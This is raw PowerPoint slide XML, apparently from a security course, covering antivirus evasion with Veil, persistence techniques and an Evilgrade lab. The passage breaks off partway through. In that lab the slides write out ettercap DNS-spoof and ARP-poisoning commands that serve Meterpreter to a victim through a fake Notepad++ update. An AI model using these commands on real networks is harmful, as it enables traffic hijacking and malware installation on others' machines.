                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Compare detection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>VirusTotal!</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="328930" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Check: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>https:/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/www.christophertruncer.com/veil</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>a-payload- </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>generator-to-bypass-antivirus/</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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242061" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3132455">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>Insta</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="0" dirty="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>lat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="0" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-5" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1206246"/>
            <a:ext cx="8855075" cy="3121025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Make yourself at home</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Wingdings"/>
              <a:cs typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-444500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="457834" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Persistence and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>invocation</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="605"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Copying </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files, changing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>registry,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Dropping next stages of attack and removing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>footprints</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-444500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="457834" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Detecting attacker would be very difficult from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-140" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>point</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>onward!</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266191" y="6547408"/>
            <a:ext cx="7847965" cy="194945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="140" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>https:/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/www.sans.or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4419600"/>
            <a:ext cx="9125458" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>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3429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54939" y="3765169"/>
            <a:ext cx="5290185" cy="559435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="756285" indent="-743585">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Installation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Evilgrade</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4762" y="0"/>
            <a:ext cx="9153525" cy="3509962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2115820">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Installation -</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Evilgrade</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231140" y="1130046"/>
            <a:ext cx="7604125" cy="5805805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A common method for attackers to get  persistence on your network is to inject</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>their  files during upgrade of existing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tools.</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="333375" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lab </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>we are using Notepad++</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>update  request to deliver</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter.</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>•	In Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(192.168.248.134):</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="525780" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># echo "notepad-plus.sourceforge.net A  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>192.168.248.134" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/etc/ettercap/etter.dns</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t># ettercap -TqM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Press P to see </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>list </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>plugins</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
